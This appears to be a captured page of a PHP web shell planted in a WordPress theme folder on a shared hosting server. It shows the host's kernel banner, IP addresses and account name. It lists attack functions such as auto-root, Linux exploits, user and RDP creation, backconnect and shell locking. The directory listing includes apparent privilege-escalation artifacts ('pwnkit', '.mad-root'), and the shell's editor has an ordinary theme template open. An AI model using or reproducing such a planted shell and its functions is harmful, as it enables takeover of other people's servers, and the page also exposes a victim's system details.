Linux webm003.cluster129.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.129.20.3 | : 216.73.217.69
Cant Read [ /etc/named.conf ]
8.4.22
chloega
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
chloega /
www /
wp-content /
themes /
bravada /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwxr-xr-x
content
[ DIR ]
drwxr-xr-x
cryout
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
resources
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
404.php
896
B
-rw-r--r--
archive.php
2.03
KB
-rw-r--r--
comments.php
1.45
KB
-rw-r--r--
footer.php
1009
B
-rw-r--r--
front-page.php
950
B
-rw-r--r--
functions.php
1.66
KB
-rw-r--r--
header.php
2.83
KB
-rw-r--r--
image.php
2.85
KB
-rw-r--r--
index.php
1.07
KB
-rw-r--r--
loco.xml
893
B
-rw-r--r--
page.php
658
B
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.txt
16.47
KB
-rw-r--r--
screenshot.png
1.2
MB
-rw-r--r--
search.php
1.26
KB
-rw-r--r--
searchform.php
629
B
-rw-r--r--
sidebar-footer.php
475
B
-rw-r--r--
sidebar-left.php
1.21
KB
-rw-r--r--
sidebar-right.php
1.13
KB
-rw-r--r--
single.php
3.52
KB
-rw-r--r--
style.css
205.37
KB
-rw-r--r--
woocommerce.php
805
B
-rw-r--r--
wpml-config.xml
903
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : single.php
<?php /** * The Template for displaying all single posts. * * @package Bravada */ get_header(); ?> <div id="container" class="<?php bravada_get_layout_class(); ?>"> <main id="main" class="main"> <?php cryout_before_content_hook(); ?> <?php while ( have_posts() ) : the_post(); ?> <article id="post-<?php the_ID(); ?>" <?php post_class(); cryout_schema_microdata( 'article' );?>> <div class="schema-image"> <?php cryout_featured_hook(); ?> </div> <div class="article-inner"> <header> <div class="entry-meta beforetitle-meta"> <?php cryout_post_title_hook(); ?> </div><!-- .entry-meta --> <?php the_title( '<h1 class="entry-title singular-title" ' . cryout_schema_microdata('entry-title', 0) . '>', '</h1>' ); ?> <div class="entry-meta aftertitle-meta"> <?php cryout_post_meta_hook(); ?> </div><!-- .entry-meta --> </header> <?php cryout_singular_before_inner_hook(); ?> <div class="entry-content" <?php cryout_schema_microdata('entry-content'); ?>> <?php the_content(); ?> <?php wp_link_pages( array( 'before' => '<div class="page-link"><span>' . __( 'Pages:', 'bravada' ), 'after' => '</span></div>' ) ); ?> </div><!-- .entry-content --> <footer class="entry-meta entry-utility"> <?php cryout_post_utility_hook(); ?> </footer><!-- .entry-utility --> </div><!-- .article-inner --> <?php cryout_singular_after_inner_hook(); ?> </article><!-- #post-## --> <?php if ( get_the_author_meta( 'description' ) ) { // If a user has filled out their description, show a bio on their entries get_template_part( 'content/user-bio' ); } ?> <?php cryout_singular_before_comments_hook(); ?> <?php comments_template( '', true ); ?> <?php endwhile; // end of the loop. ?> <?php cryout_after_content_hook(); ?> </main><!-- #main --> <?php bravada_get_sidebar(); ?> </div><!-- #container --> <?php if ( 1 == cryout_get_option ('theme_singlenav') ) { ?> <nav id="nav-below" class="navigation"> <?php $bravada_prevpost = get_previous_post( true ); $bravada_nextpost = get_next_post( true ); $default = '<img src="' . esc_url( get_header_image() ) . '" alt="" loading="lazy" />'; $bravada_prevthumb = (isset($bravada_prevpost->ID) && get_the_post_thumbnail( $bravada_prevpost->ID) ) ? wp_get_attachment_image( get_post_thumbnail_id( $bravada_prevpost->ID ), 'large' ) : $bravada_prevthumb = $default; $bravada_nextthumb = (isset($bravada_nextpost->ID) && get_the_post_thumbnail( $bravada_nextpost->ID) ) ? wp_get_attachment_image( get_post_thumbnail_id( $bravada_nextpost->ID ), 'large' ) : $bravada_nextthumb = $default; ?> <div class="nav-previous"> <?php previous_post_link( '%link', '<em>' . __('Previous', 'bravada') . '</em>' . '<span>%title</span>', true ); ?> <?php echo $bravada_prevthumb; ?> </div> <div class="nav-next"> <?php next_post_link( '%link', '<em>' . __('Next', 'bravada') . '</em>' . '<span>%title</span>', true ); ?> <?php echo $bravada_nextthumb; ?> </div> </nav><!-- #nav-below --> <?php } ?> <?php if ( 2 == cryout_get_option( 'theme_singlenav' ) ) { ?> <nav id="nav-fixed"> <div class="nav-previous"><?php previous_post_link( '%link', '<i class="icon-fixed-nav"></i>', true ); previous_post_link( '%link', '<span>%title</span>', true ); ?></div> <div class="nav-next"><?php next_post_link( '%link', '<i class="icon-fixed-nav"></i>', true ); next_post_link( '%link', '<span>%title</span>', true ); ?></div> </nav> <?php } ?> <?php get_footer();
Close